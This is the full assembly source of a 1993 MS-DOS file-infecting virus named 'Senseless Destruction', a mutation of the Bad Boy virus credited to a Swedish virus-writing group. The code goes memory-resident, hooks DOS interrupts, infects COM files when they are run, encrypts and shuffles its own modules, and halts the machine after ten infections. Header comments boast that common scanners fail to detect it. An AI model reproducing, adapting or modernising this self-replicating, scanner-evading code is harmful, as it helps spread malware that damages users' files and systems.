You are on page 1of 10

; virusname: senseless destruction

; country : sweden
; author : metal militia / immortal riot
; date : 07-22-1993
;
; this is an mutation of bad-boy from 'unknown'.
; many thanks to the scratch coder of bad-boy...
;
; we've tried this virus ourself, and it works just fine.
; it uses the tsr, is non-overwriting, and may halt
; the system. command files increase by 1069 bytes.
; originally from europe discovered in 1991.
;
; this is the second mutation of the bad boy virus,
; the first mutation was found in bulgaria.
;
; mcafee scan v105 can't find it, and
; s&s toolkit 6.5 don't find it either.
; i haven't tried with scanners like fprot/tbscan,
; but they will probably report some virus structure.
;
; best regards : [metal militia]
; [the unforgiven]

code segment
assume cs:code,ds:code
.radix 16
org 100
start:
push word ptr cs:[tabb+2]
push cs
pop ds
jmp loopshit
otto:
jmp start
loopshit:
jmp word ptr cs:[tabb]

curofs dw ?
files db 0 ;number of infected files from this copy
fsize dw 2 ;size of infected file
ftime dw ?
fdate dw ?
stdint21 dd ?
oldint13 dd ?
oldint21 dd ?
oldint24 dd ?

;------------- table with module parameters --------------------


tabb :
dw offset false_mod_1 ;00
dw offset mod_2 ;02
dw offset mod_3 ;04
dw offset mod_4 ;06 ;offset modules
dw offset mod_5 ;08
dw offset mod_6 ;0a
dw offset mod_7 ;0c
dw offset mod_8 ;0e
dw offset mod_2 - offset mod_1;10
dw offset mod_3 - offset mod_2;12
dw offset mod_4 - offset mod_3;14
dw offset mod_5 - offset mod_4;16
dw offset mod_6 - offset mod_5;18 ;size modules
dw offset mod_7 - offset mod_6;1a
dw offset mod_8 - offset mod_7;1c
dw offset myend - offset mod_8;1e

;------------- module - 1 - coder/decoder ----------------------


mod_1:
mov bx,offset tabb+2 ;first module to working (module 2)
mov cx,6 ;number of modules to working
mod_1_lp1:
cmp bx,offset tabb+0a
jne mod_1_cont
add bx,2
mod_1_cont:
push bx
push cx
mov ax,[bx] ;ax - offset module
mov cx,[bx+10] ;cx - size of module
mov bx,ax
mod_1_lp2:
xor byte ptr [bx],al
inc bx
loop mod_1_lp2
pop cx
pop bx
add bx,2
loop mod_1_lp1
ret

;------------- module - 2 - mutation to memory -----------------


mod_2:
;instalation check

mov es,cs:[2] ;memory size


mov di,100
mov si,100
mov cx,0bh
repe cmpsb
jne mod_2_install ;jump if not install
jmp word ptr cs:[tabb+06] ;if install, jump to module 4

mod_2_install:
;instalation

mov ax,cs
dec ax
mov ds,ax

cmp byte ptr ds:[0],'z'


je mod_2_cont

jmp word ptr cs:[tabb+6] ;if no last mcb - go to mod4


mod_2_cont:
sub word ptr ds:[3],0c0
mov ax,es
sub ax,0c0
mov es,ax
mov word ptr ds:[12],ax ;decrement memory size with 2k
push cs
pop ds

mod_2_mut:
mov byte ptr cs:files,0

mov di,100
mov cx,offset mod_1-100
mov si,100
rep movsb ;write table to new memory

mov bx,word ptr cs:[tabb]


add bx,offset mod_1_lp2-offset mod_1+1
xor byte ptr [bx],18 ;change code method

mov cx,8
mov word ptr curofs,offset mod_1
mod_2_lp1:
push cx
call mod_2_rnd ;generate random module addres
push bx ;addres in table returned from mod_2_rnd
mov ax,[bx] ;offset module
push ax
add bx,10
mov cx,[bx] ;length of module
pop si
pop bx
xchg di,curofs
mov word ptr es:[bx],di ;change module offset in table
rep movsb ;copy module to new memory
xchg di,curofs ;change current offset in new memory
mov ax,8000
or word ptr [bx],ax ;mark module - used
pop cx
loop mod_2_lp1
mov cl,8
not ax
mov bx,offset tabb
mod_2_lp2:
and word ptr [bx],ax ;unmark all modules
add bx,2
loop mod_2_lp2

jmp word ptr cs:[tabb+4] ;go to module 3

mod_2_rnd:
push cx
push es
xor cx,cx
mov es,cx
mod_2_lp3:
mov bx,es:[46c]
db 81,0e3,07,00 ;and bx,7
shl bx,1
add bx,offset tabb
test [bx],8000
jnz mod_2_lp3
pop es
pop cx
ret

;------------- module - 3 - set interrupt vectors ---------------


mod_3:
xor ax,ax
mov ds,ax

mov ax,ds:[4*21]
mov word ptr es:[oldint21],ax
mov ax,ds:[4*21+2]
mov word ptr es:[oldint21+2],ax

mov ah,30
int 21
cmp ax,1e03
jne mod_3_getvec

mov word ptr es:[stdint21],1460


mov ax,1203
push ds
int 2f
mov word ptr es:[stdint21+2],ds
pop ds
jmp mod_3_setvec

mod_3_getvec:
mov ax,ds:[4*21]
mov word ptr es:[stdint21],ax
mov ax,ds:[4*21+2]
mov word ptr es:[stdint21+2],ax

mod_3_setvec:
cli
mov ax,word ptr es:[tabb+0c]
mov ds:[4*21],ax
mov ax,es
mov ds:[4*21+2],ax
sti

mov cx,es
mov ah,13 ;
int 2f ;
push es ;
mov es,cx ;
mov word ptr es:[oldint13],dx ; get standart int13 addres
mov word ptr es:[oldint13+2],ds ;
pop es ;
int 2f ;

jmp word ptr cs:[tabb+06] ;go to module 4


;------------- module - 4 - restore old program code & start ----
mod_4:
push cs
push cs
pop ds
pop es
mov si,word ptr cs:[tabb+06]
add si,offset mod_4_cont - offset mod_4
mov di,cs:fsize
add di,offset myend+1
push di
mov cx,offset mod_5 - offset mod_4_cont
cld
rep movsb
ret
mod_4_cont:
mov si,cs:fsize
add si,100

cmp si,offset myend+1


jnc mod_4_cnt
mov si,offset myend+1
mod_4_cnt:
mov di,100
mov cx,offset myend-100
rep movsb
mov ax,100 ;
push ax ; jmp 100
ret ;

;------------- module - 5 - special program ---------------------


mod_5:
mov ah,9
mov dx,word ptr [tabb+8]
add dx,offset msg-offset mod_5
push cs
pop ds
int 21
cli
hlt

msg db 0dh,0a,'senseless destruction...',7,7,'$'

;------------- module - 6 - int 24 header -----------------------


mod_6:
mov al,3
iret
db 'protecting what we are ',0
db 'joining together to take on the world.. ',0
db 'metal militia [imm0rtal ri0t] ',0

;------------- module - 7 - int 21 header -----------------------


mod_7:
push bx
push si
push di
push es
push ax

cmp ax,4b00
je mod_7_begin
jmp mod_7_exit
mod_7_begin:
push ds
push cs ;
pop es ;
xor ax,ax ;
mov ds,ax ;
mov si,4*24 ;
mov di,offset oldint24 ;
movsw ; change int24 vector
movsw ;
mov ax,word ptr cs:[tabb+0a] ;
cli ;
mov ds:[4*24],ax ;
mov ax,cs ;
mov ds:[4*24+2],ax ;
sti
pop ds

mov ax,3d00 ;
pushf ;
call cs:oldint21 ;
jc mod_7_ex ; open,infect,close file
mov bx,ax ;
mod_7_infect: ;
call word ptr cs:[tabb+0e] ;
pushf
mov ah,3e ;
pushf ;
call cs:oldint21 ;
popf
jc mod_7_ex

push ds ;
cli ;
xor ax,ax ;
mov ds,ax ;
mov ax,word ptr cs:[oldint13] ;
xchg ax,word ptr ds:[4*13] ;
mov word ptr cs:[oldint13],ax ; exchange int13 vectors
mov ax,word ptr cs:[oldint13+2] ;
xchg ax,word ptr ds:[4*13+2] ;
mov word ptr cs:[oldint13+2],ax ;
sti ;
pop ds ;
mod_7_ex:
push ds ;
xor ax,ax ;
mov ds,ax ;
mov ax,word ptr cs:oldint24 ;
mov ds:[4*24],ax ;
mov ax,word ptr cs:oldint24+2 ; restore int24 vector
mov ds:[4*24+2],ax ;
pop ds ;

mod_7_exit:
pop ax
pop es
pop di
pop si
pop bx

jmp cs:oldint21

;------------- module - 8 - infecting (bx - file handle) --------


mod_8:
push cx
push dx
push ds
push es
push di
push bp

push bx
mov ax,1220
int 2f
mov bl,es:[di]
xor bh,bh
mov ax,1216
int 2f
pop bx

mov ax,word ptr es:[di+11]


cmp ax,0f000
jc mod_8_c
jmp mod_8_exit

mod_8_c:
mov word ptr es:[di+2],2 ;open mode - r/w

mov ax,es:[di+11]
mov cs:fsize,ax ; save file size

mov ax,word ptr es:[di+0dh] ;


mov word ptr cs:[ftime],ax ; save file date/time
mov ax,word ptr es:[di+0f] ;
mov word ptr cs:[fdate],ax ;

push cs ;
pop ds ;
mov dx,offset myend+1 ;
mov cx,offset myend-100 ; read first bytes
mov ah,3f ;
pushf
call cs:oldint21
jnc mod_8_cnt
jmp mod_8_exit

mod_8_cnt:
mov bp,ax ; ax - bytes read
mov si,dx
mov ax,'mz'
cmp ax,word ptr ds:[si]
jne mod_8_nxtchk
jmp mod_8_exit
mod_8_nxtchk:
xchg ah,al
cmp ax,ds:[si]
jne mod_8_cnt2
jmp mod_8_exit

mod_8_cnt2:
push es
push di
push cs ;
pop es ;
mov si,100 ;
mov di,dx ; check for infected file
mov cx,0bh ;
repe cmpsb ;
pop di
pop es
jne mod_8_cnt1 ;
jmp mod_8_exit
mod_8_cnt1:
mov word ptr es:[di+15],0 ; fp:=0

push es
push di
mov si,word ptr cs:[tabb+0e]
add si,offset mod_8_cont - offset mod_8
xor di,di
push cs
pop es
mov cx,offset mod_8_cont_end - offset mod_8_cont
cld
rep movsb
pop di
pop es

mov si,word ptr cs:[tabb+0e]


add si,offset mod_8_cont_end - offset mod_8
push si
xor si,si
push si

push ds ;
cli ;
xor ax,ax ;
mov ds,ax ;
mov ax,word ptr cs:[oldint13] ;
xchg ax,word ptr ds:[4*13] ;
mov word ptr cs:[oldint13],ax ;
mov ax,word ptr cs:[oldint13+2] ; exchange int13 vectors
xchg ax,word ptr ds:[4*13+2] ;
mov word ptr cs:[oldint13+2],ax ;
sti ;
pop ds ;

ret

mod_8_cont:
push bx
call word ptr cs:[tabb] ; code virus
pop bx

mov dx,100 ;
mov ah,40 ; write code in begin
mov cx,offset myend-0ff
pushf ;
call cs:stdint21 ;

pushf
push bx
call word ptr cs:[tabb] ; decode virus
pop bx
popf
jnc mod_8_cont1
pop ax
mov ax,word ptr cs:[tabb+0e]
add ax,offset mod_8_ext - offset mod_8
push ax
ret
mod_8_cont1:
mov ax,es:[di+11] ; fp:=end of file
mov word ptr es:[di+15],ax ;

mov dx,offset myend+1


mov cx,bp ; bp - files read
mov ah,40 ;
pushf ;
call cs:stdint21 ; write in end of file

ret

mod_8_cont_end:
mov ax,5701 ;
mov cx,cs:ftime ;
mov dx,cs:fdate ; restore file date/time
pushf ;
call cs:oldint21 ;

inc cs:files
cmp cs:files,0a
jne mod_8_ext
call word ptr cs:[tabb+8]
jmp short mod_8_ext
mod_8_exit:
stc
jmp short mod_8_ex
mod_8_ext:
clc
mod_8_ex:
pop bp
pop di
pop es
pop ds
pop dx
pop cx
ret

;---------------------------------------------------------------

myend db 0

int 20 ;code of infected file

false_mod_1:
mov word ptr cs:[tabb],offset mod_1
ret

code ends
end start
#